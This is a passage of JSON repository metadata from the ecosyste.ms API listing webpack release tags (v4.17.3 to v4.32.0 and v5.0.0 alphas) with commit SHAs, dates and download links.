//repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0/manifests"},{"name":"v5.0.0-alpha.12","sha":"e72fed4877c59d6d842a3596328c6e045d2b5eca","kind":"tag","published_at":"2019-05-10T22:40:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12/manifests"},{"name":"v4.31.0","sha":"2e1e1799b1fc56b68dbddbe8712ff6393654ccbd","kind":"tag","published_at":"2019-05-09T07:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0/manifests"},{"name":"v4.30.0","sha":"b72b96a2bc5d2c7a308d0943567e0db191d3c358","kind":"tag","published_at":"2019-04-12T20:06:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0/manifests"},{"name":"v4.29.6","sha":"685a0626cb10664133ef2fb2e2f9f4cb3971402a","kind":"tag","published_at":"2019-02-28T09:44:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6/manifests"},{"name":"v5.0.0-alpha.11","sha":"589e4e4d9d42401d638c442e5b83bb28213b614a","kind":"tag","published_at":"2019-02-19T10:50:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11/manifests"},{"name":"v4.29.5","sha":"073813f1913e000302be557272b2d11195f9c2e6","kind":"tag","published_at":"2019-02-18T10:05:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5/manifests"},{"name":"v4.29.4","sha":"7ecf992bd97204fbfaeed18e3e21fb9fcd46352f","kind":"tag","published_at":"2019-02-15T15:10:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4/manifests"},{"name":"v5.0.0-alpha.10","sha":"2d7338d2b5cc70c6bd250a878d8a9717cc02cb95","kind":"tag","published_at":"2019-02-07T08:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10/manifests"},{"name":"v4.29.3","sha":"b934e26da8b65bdf36b3c71141d0c2d8397d9f44","kind":"tag","published_at":"2019-02-07T08:22:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3/manifests"},{"name":"v4.29.2","sha":"74b8aac0adfb0c79d70a99fa86635930db8944fd","kind":"tag","published_at":"2019-02-06T14:05:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2/manifests"},{"name":"v4.29.1","sha":"6934b9814492b049e67efb3ccf7254d8917e01f9","kind":"tag","published_at":"2019-02-04T17:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1/manifests"},{"name":"v5.0.0-alpha.9","sha":"92a36b1a9c0ed554c0f7e74bf1bc98c77a768fcc","kind":"tag","published_at":"2019-01-27T12:18:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9/manifests"},{"name":"v4.29.0","sha":"25bccd4c487a5bf743efc62947d81a8eaa81a90f","kind":"tag","published_at":"2019-01-20T17:38:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0/manifests"},{"name":"v5.0.0-alpha.8","sha":"adff7f61a2595ea9a04c0f3070add21be01607fb","kind":"tag","published_at":"2019-01-19T19:24:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8/manifests"},{"name":"v5.0.0-alpha.7","sha":"18aca2fcb148d04ba3d0b37742f50534d42a7ec3","kind":"tag","published_at":"2019-01-19T12:11:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7/manifests"},{"name":"v5.0.0-alpha.6","sha":"4be6797700753a54b223600f01e941580b6a6ba3","kind":"tag","published_at":"2019-01-15T16:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6/manifests"},{"name":"v4.28.4","sha":"fdb6b139b94273e5b18870262c193a93f65132e8","kind":"tag","published_at":"2019-01-10T15:48:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4/manifests"},{"name":"v5.0.0-alpha.5","sha":"0d9ed482bc39fb23040ffd26823e0b7ed73320cb","kind":"tag","published_at":"2019-01-09T14:20:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5/manifests"},{"name":"v5.0.0-alpha.4","sha":"b97bc4bc062cd5395de8b00115519472645d57d0","kind":"tag","published_at":"2019-01-08T14:09:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4/manifests"},{"name":"v5.0.0-alpha.3","sha":"762155dc2da6795dfe72a5cbeb632fc42c9c49e0","kind":"tag","published_at":"2018-12-29T17:13:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3/manifests"},{"name":"v4.28.3","sha":"983c2616ec1b869bfb659b6331bd2fe2abc66e23","kind":"tag","published_at":"2018-12-29T11:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3/manifests"},{"name":"v5.0.0-alpha.2","sha":"88f0e18e64c7935723348de3b7dd1aa92050999c","kind":"tag","published_at":"2018-12-26T10:33:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2/manifests"},{"name":"v5.0.0-alpha.1","sha":"90a0866efcd35401353c9e8d5c904fe2cd407f7e","kind":"tag","published_at":"2018-12-23T20:24:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1/manifests"},{"name":"v4.28.2","sha":"fe514dd975f1d2dd1546906a6f4c0a6b2a0e3761","kind":"tag","published_at":"2018-12-22T12:53:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2/manifests"},{"name":"v5.0.0-alpha.0","sha":"3f068c38610a1edfd6be2adf53a2dea44525cfde","kind":"tag","published_at":"2018-12-21T14:17:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0/manifests"},{"name":"v4.28.1","sha":"7a6a71f1e9349f86833de12a673805621f0fc6f6","kind":"tag","published_at":"2018-12-20T17:10:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1/manifests"},{"name":"v4.28.0","sha":"e871eeb121a69efd6cbfa56f977d5843bf030202","kind":"tag","published_at":"2018-12-19T10:37:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0/manifests"},{"name":"v4.27.1","sha":"4056506488c1e071dfc9a0127daa61bf531170bf","kind":"tag","published_at":"2018-12-05T19:13:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1/manifests"},{"name":"v4.27.0","sha":"f47bf8b64f9698cb05eff62832a04267823039cf","kind":"tag","published_at":"2018-12-04T09:31:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0/manifests"},{"name":"v4.26.1","sha":"8e841feda3ef32c64df1a175d0d9f71e47cfbe8e","kind":"tag","published_at":"2018-11-25T20:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1/manifests"},{"name":"v4.26.0","sha":"04f90c53eeae4817a9c515a0daca119d0decfa45","kind":"tag","published_at":"2018-11-19T08:39:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0/manifests"},{"name":"v4.25.1","sha":"2361995a429794d372d61e3fb628dea3929e0ca4","kind":"tag","published_at":"2018-11-05T18:12:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1/manifests"},{"name":"v4.25.0","sha":"290094e10a990aa3fd8073b02b4dc57781f924d7","kind":"tag","published_at":"2018-11-05T08:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0/manifests"},{"name":"v4.24.0","sha":"9e397b5664dab3af0ceb2fa93cb5c539f02c023c","kind":"tag","published_at":"2018-11-02T12:11:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0/manifests"},{"name":"v4.23.1","sha":"607cf70eddd213a690585276f7124963536781e7","kind":"tag","published_at":"2018-10-25T08:26:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1/manifests"},{"name":"v4.23.0","sha":"a4feb6e15ff7ac19bab1a458de369a887dde44fe","kind":"tag","published_at":"2018-10-24T15:45:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0/manifests"},{"name":"v4.22.0","sha":"894eca20bd678ca5473cfca28f332a7322c64b8e","kind":"tag","published_at":"2018-10-21T09:34:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0/manifests"},{"name":"v4.21.0","sha":"432d2a3f174b08d5f4f7de018799c97a18efa1fd","kind":"tag","published_at":"2018-10-17T17:47:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0/manifests"},{"name":"v4.20.2","sha":"5c5e902c8e89afeb51ad130f12a908b89d627fc5","kind":"tag","published_at":"2018-09-25T20:31:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2/manifests"},{"name":"v4.20.1","sha":"91e9dd77062797e3e716485f295d32a5cab57042","kind":"tag","published_at":"2018-09-25T13:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1/manifests"},{"name":"v4.20.0","sha":"c4d8a3c8d67239f6457fd7560d9bea14524ff4f0","kind":"tag","published_at":"2018-09-25T07:15:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0/manifests"},{"name":"v4.19.1","sha":"b7121c15e1cc810ead6aa0f4b2aad4666c072257","kind":"tag","published_at":"2018-09-18T07:56:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1/manifests"},{"name":"v4.19.0","sha":"6bf832398c3905e06300596caddb073c583d94c4","kind":"tag","published_at":"2018-09-13T22:04:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0/manifests"},{"name":"v4.18.1","sha":"c51a1bab94e4ff8ffca443e4fcb038bc4911e65e","kind":"tag","published_at":"2018-09-13T10:22:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1/manifests"},{"name":"v4.18.0","sha":"ee7d9485fa30d1d3d5adbfdfb52c8f57ae8b439e","kind":"tag","published_at":"2018-09-10T15:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0/manifests"},{"name":"v4.17.3","sha":"ee27d36e7cb0bed3ca32911165bbf01fef993e48","kind":"tag","published_at":"2018-09-10T14:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack